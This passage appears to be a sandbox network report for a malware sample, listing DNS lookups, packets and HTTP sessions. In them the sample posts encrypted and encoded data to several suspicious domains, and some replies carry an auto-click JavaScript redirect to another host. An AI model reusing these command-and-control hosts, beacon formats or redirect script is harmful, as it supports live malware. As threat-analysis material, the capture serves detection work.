Jan 11, 2025 01:02:32.302387953 CET	49995	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:33.329493999 CET	49996	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:33.336777925 CET	80	49996	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:33.336844921 CET	49996	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:33.353890896 CET	49996	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:33.360186100 CET	80	49996	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:34.860589027 CET	49996	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:34.867403984 CET	80	49996	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:34.869539976 CET	49996	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:35.943293095 CET	49997	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:35.951169968 CET	80	49997	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:35.951257944 CET	49997	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:36.109380007 CET	49997	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:36.116914988 CET	80	49997	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:36.119307041 CET	80	49997	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:37.623969078 CET	49997	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:37.628925085 CET	80	49997	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:37.629014969 CET	49997	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:38.676882029 CET	49999	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:38.683465958 CET	80	49999	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:38.683578968 CET	49999	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:38.707824945 CET	49999	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:38.714549065 CET	80	49999	85.159.66.93	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:00:45.824686050 CET	55821	53	192.168.2.6	1.1.1.1
Jan 11, 2025 01:00:45.831661940 CET	53	55821	1.1.1.1	192.168.2.6
Jan 11, 2025 01:00:46.865626097 CET	64807	53	192.168.2.6	1.1.1.1
Jan 11, 2025 01:00:46.873528957 CET	53	64807	1.1.1.1	192.168.2.6
Jan 11, 2025 01:01:26.389095068 CET	60956	53	192.168.2.6	1.1.1.1
Jan 11, 2025 01:01:26.426794052 CET	53	60956	1.1.1.1	192.168.2.6
Jan 11, 2025 01:01:42.127949953 CET	58369	53	192.168.2.6	1.1.1.1
Jan 11, 2025 01:01:42.591679096 CET	53	58369	1.1.1.1	192.168.2.6
Jan 11, 2025 01:01:56.159468889 CET	51081	53	192.168.2.6	1.1.1.1
Jan 11, 2025 01:01:56.625801086 CET	53	51081	1.1.1.1	192.168.2.6
Jan 11, 2025 01:02:30.659041882 CET	57108	53	192.168.2.6	1.1.1.1
Jan 11, 2025 01:02:30.764777899 CET	53	57108	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 01:00:45.824686050 CET	192.168.2.6	1.1.1.1	0x41e	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:00:46.865626097 CET	192.168.2.6	1.1.1.1	0x1f96	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:26.389095068 CET	192.168.2.6	1.1.1.1	0xdcf7	Standard query (0)	www.nb-shenshi.buzz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:42.127949953 CET	192.168.2.6	1.1.1.1	0x4b26	Standard query (0)	www.laohub10.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:56.159468889 CET	192.168.2.6	1.1.1.1	0x1df4	Standard query (0)	www.xcvbj.asia	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:02:30.659041882 CET	192.168.2.6	1.1.1.1	0x23b9	Standard query (0)	www.soainsaat.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 01:00:42.307007074 CET	1.1.1.1	192.168.2.6	0xfceb	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:00:42.307007074 CET	1.1.1.1	192.168.2.6	0xfceb	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:00:45.831661940 CET	1.1.1.1	192.168.2.6	0x41e	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:00:46.873528957 CET	1.1.1.1	192.168.2.6	0x1f96	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:26.426794052 CET	1.1.1.1	192.168.2.6	0xdcf7	No error (0)	www.nb-shenshi.buzz		161.97.142.144	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:42.591679096 CET	1.1.1.1	192.168.2.6	0x4b26	No error (0)	www.laohub10.net	r0lqcud7.nbnnn.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:01:42.591679096 CET	1.1.1.1	192.168.2.6	0x4b26	No error (0)	r0lqcud7.nbnnn.xyz		23.225.159.42	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:42.591679096 CET	1.1.1.1	192.168.2.6	0x4b26	No error (0)	r0lqcud7.nbnnn.xyz		23.225.160.132	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:42.591679096 CET	1.1.1.1	192.168.2.6	0x4b26	No error (0)	r0lqcud7.nbnnn.xyz		27.124.4.246	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:42.591679096 CET	1.1.1.1	192.168.2.6	0x4b26	No error (0)	r0lqcud7.nbnnn.xyz		202.79.161.151	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:01:56.625801086 CET	1.1.1.1	192.168.2.6	0x1df4	No error (0)	www.xcvbj.asia		149.88.81.190	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:02:30.764777899 CET	1.1.1.1	192.168.2.6	0x23b9	No error (0)	www.soainsaat.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:02:30.764777899 CET	1.1.1.1	192.168.2.6	0x23b9	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:02:30.764777899 CET	1.1.1.1	192.168.2.6	0x23b9	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pywolwnvd.biz

ssbzmoy.biz

www.nb-shenshi.buzz

www.laohub10.net

www.xcvbj.asia

www.soainsaat.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49731	54.244.188.177	80	572	C:\Users\user\Desktop\uG3I84bQEr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:00:45.974980116 CET	360	OUT	POST /exqctojotladvua HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 808
Jan 11, 2025 01:00:45.975164890 CET	808	OUT	Data Raw: 62 82 06 ff f2 32 1c 8c 1c 03 00 00 6f 24 1d 60 8a 22 41 49 fd 58 57 24 b7 34 45 17 1c 1f e0 45 de 23 39 29 de 37 7c 34 82 f9 c4 96 04 00 17 e3 6b 0b 4b fc 43 f3 5e 4b 92 5d 6d c8 19 0a d2 a6 7f 0d 63 a4 9e a5 1a f6 11 f4 a7 3e 97 31 69 fa 30 4b Data Ascii: b2o$`"AIXW$4EE#9)7\|4kKC^K]mc>1i0K}wsHl^?,^Uiu`gN_!Ab0paF?tR3`s/;~%(pI}L,#Nyk=E!Au]RKUgr^
Jan 11, 2025 01:00:46.673051119 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:00:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c9d8e757cea1f07df0b72fd97ff8b1c9\|8.46.123.189\|1736553646\|1736553646\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49738	18.141.10.107	80	572	C:\Users\user\Desktop\uG3I84bQEr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:00:47.220217943 CET	357	OUT	POST /dwlowhbefckeyd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 808
Jan 11, 2025 01:00:47.220243931 CET	808	OUT	Data Raw: 04 d6 05 3a 44 56 fa 30 1c 03 00 00 3d 6e 6b 45 0f c1 0f ce 24 54 c9 50 b8 44 37 0e eb c1 00 16 9b 17 06 98 d8 75 62 77 21 b9 26 67 ac d1 dd a9 7b 54 a5 8e cb a7 73 bb c0 a4 c4 dd fe b0 66 2f 31 b3 d6 22 d1 9f c5 4d ca bb 5e 50 66 35 0b 52 dd 1d Data Ascii: :DV0=nkE$TPD7ubw!&g{Tsf/1"M^Pf5R-=8R-86&)&R@B~k1qrld2o"3C;dW^QCiNzy>:eaabd_d\+0HDZ>>EkMl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49967	161.97.142.144	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:01:26.450305939 CET	502	OUT	GET /xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.nb-shenshi.buzz Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Jan 11, 2025 01:01:27.071369886 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 00:01:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Jan 11, 2025 01:01:27.071391106 CET	1236	IN	Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Jan 11, 2025 01:01:27.071408987 CET	448	IN	Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
Jan 11, 2025 01:01:27.071420908 CET	250	IN	Data Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63 Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49986	23.225.159.42	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:01:42.744792938 CET	756	OUT	POST /sgdd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/sgdd/ Cache-Control: no-cache Content-Length: 209 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50 Data Ascii: 9V7X=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
Jan 11, 2025 01:01:43.205363989 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49987	23.225.159.42	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:01:45.452917099 CET	780	OUT	POST /sgdd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/sgdd/ Cache-Control: no-cache Content-Length: 233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6a 42 38 74 7a 56 51 42 2f 6a 61 47 4a 75 64 6d 51 74 2f 79 78 73 46 7a 51 70 44 31 34 34 67 4d 54 4e 46 55 69 35 31 76 61 64 7a 67 3d 3d Data Ascii: 9V7X=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGjB8tzVQB/jaGJudmQt/yxsFzQpD144gMTNFUi51vadzg==
Jan 11, 2025 01:01:45.971529961 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49988	23.225.159.42	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:01:48.006728888 CET	1793	OUT	POST /sgdd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/sgdd/ Cache-Control: no-cache Content-Length: 1245 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 55 52 48 6d 37 6e 6b 68 44 67 34 31 6e 63 72 36 66 5a 64 30 54 70 53 46 70 6c 53 31 73 4a 34 7a 4a 46 46 47 51 67 46 48 31 41 77 63 7a 33 4d 30 66 57 2b 76 4c 4f 76 73 4d 66 4e 2f 75 75 52 6a 61 6a 6e 77 6b 32 77 37 42 70 5a 48 48 36 33 71 4e 6e 43 2f 34 44 6d 4d 55 2f 6c 4b 53 66 6a 78 63 4c 63 71 6a 38 34 44 4f 68 51 74 6c 43 6d 68 45 65 47 5a 42 46 50 2b 69 53 36 56 65 7a 55 6f 59 49 2b 78 36 55 43 58 6e 73 4a 55 74 46 32 6e 32 5a 53 54 31 47 76 74 68 35 38 71 4e 65 53 56 6c 73 72 [TRUNCATED] Data Ascii: 9V7X=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkhDg41ncr6fZd0TpSFplS1sJ4zJFFGQgFH1Awcz3M0fW+vLOvsMfN/uuRjajnwk2w7BpZHH63qNnC/4DmMU/lKSfjxcLcqj84DOhQtlCmhEeGZBFP+iS6VezUoYI+x6UCXnsJUtF2n2ZST1Gvth58qNeSVlsrxguAKPQG69C0uQy9UKylVIUFpNYcf93MFxKIWTnLQ8VCI4PryojYy2lluIIESYrE6a4taxQeUKBUM983ztVzhapZ/0dwrTJphaZq+tKLU4kk1L0+xr+RaXqHYfB+j8vQaIj0nkiKAfqef3oLNV2oKQ0RdBmqWtZYQoo9GxGno1ZtRT9lKVUvh+5ELiUKgsBfSwQ4pE3yI4mubtAZ027M9XIjd5qT2b0sfP4QcPruNgXNZ9BoiMcVwEcMzxZg3FiSuZDh98PP06kT6uf5GJbxBLUVvTVhxyWwU+6s/BzfVlTaxKKTfjBaWtA/cxhOyF1tTkSpsDCUckz8EBhqc0QxDTS87/BIKO2IOvazStVBFHMNQz5okuWX+Ehe54tRs9sw1gIiPfTnz0pOMH3lDW5rxMufwC1mzF1VQ8SolEI1e8xYwYLC4oYdEJ2eSKzwybOIsKGqQQ2rncXH2ZKpKXmbSuGhPz9bmq6wCEnfw8xk9quaVdtyxgtgidCbZk2q44Xoqwn0UTnc3T8qFiVIdL9YupKyM8pPSqRZN2e3IgI/nLDHAo/UIRVwmnRFDzMvj9K/K9YNolQo310NgkgQ8NEXRI/PZTZS8CZllUnheh0UA2Myorh6CfaJoQUMT1ednu4cqGPfkHmERv1Aivhxv4XleXId6x4AiVArhj [TRUNCATED]
